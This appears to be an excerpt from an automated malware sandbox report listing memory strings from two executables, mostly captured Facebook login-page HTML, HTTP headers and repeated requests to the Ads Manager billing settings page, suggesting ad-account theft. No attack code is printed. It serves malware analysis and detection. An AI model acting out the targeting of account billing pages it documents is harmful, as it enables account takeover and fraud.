Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr4xk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-WnQ","isCQuick":false});</script><script nonce="f5jFR5CM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="f5jFR5CM"></style><script nonce="f5jFR5CM">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content=" equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yW/l/0,cross/XznY7q1olI3.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="TGesA0a" /> equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tcnyEH4i">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr1k0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-xX0","isCQuick":false});</script><script nonce="tcnyEH4i">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tcnyEH4i"></style><script nonce="tcnyEH4i">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="google" content="notranslate" /><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=httpsh equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="x46HV0G8">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascrmnc","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-zzY","isCQuick":false});</script><script nonce="x46HV0G8">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="x46HV0G8"></style><script nonce="x46HV0G8">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Facebook</title><meta name="google" content="notranslate" /><link rel="canonical" href="https://www.facebook.com/login/" /><meta property="og:title" content="Log in or sign up to view" /><meta property="og:description" content=" equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @www.facebook.comCwb equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Alt-Svch3=":443"; ma=86400Priorityu=3,iX-FB-Debug9W9q7O9cwERD9yl452YLI7TlpCnSPnMmbzzsHrk1MAGejrWauIysSASFTboY1ZVsRl5CUepLa/i5ffzTF4uR5Q==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policysame-origin-allow-popupsdocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0cross-origin-embedder-policy-report-onlyrequire-corp;report-to="coep_report"report-to{"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:46:39 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control6 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000503000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604870150.000000000288F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comc equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.604851431.0000000002865000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hostwww.facebook.comc+07 equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Hwww.facebook.com/ads/manager/account_settings/account_billingalue132sames equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Kwww.facebook.com equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: LAlt-Svch3=":443"; ma=86400X-FB-Debug0vm/8I8SNdKVTJ8OyhzeiB5vOfSY+MSlVEdgCkfZyMmm399tNBJDn3byMN/GMHQLmPYx8pSyQN/MPJrxK+S1Og==origin-agent-cluster?0X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:45:36 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-Control equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.000000000047C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Lwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Lwww.facebook.comH equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.492565099.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Lwww.facebook.comHTEP equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PE)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Qwww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Rwww.facebook.comx equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Twww.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70star-mini.c10r.facebook.comwww.facebook.comll equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Uwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Uwww.facebook.comA equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: WAdelay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3CpptjY5H4saJOirX4rxBmp0_uhMIoF20XVUL5x1KP1yIX4Vn7eIoS4tIeqGz2yDxinbKnNUBVS2InnNGI6atGZxc"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{ equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wwww.facebook.com equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000504000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ad><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="f5jFR5CM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiYmP4qFaQHascr4xk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4MHk5_tx8GW0g-WnQ","isCQuick":false});</script><script nonce="f5jFR5CM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="f5jFR5CM"></style><script nonce="f5jFR5CM">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andwww.facebook.comll equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">other companies\u003C\/a> for advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_8_JS\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_StXu140q-14 sx_6e887b\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp>\u003Cdiv class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Meta Products, and measure their performance\u003C\/li>\u003Cli class=\"_9xq0\">Features on our products will not be affected\u003C\/li>\u003Cli class=\"_9xq0\">Oth equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: d-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
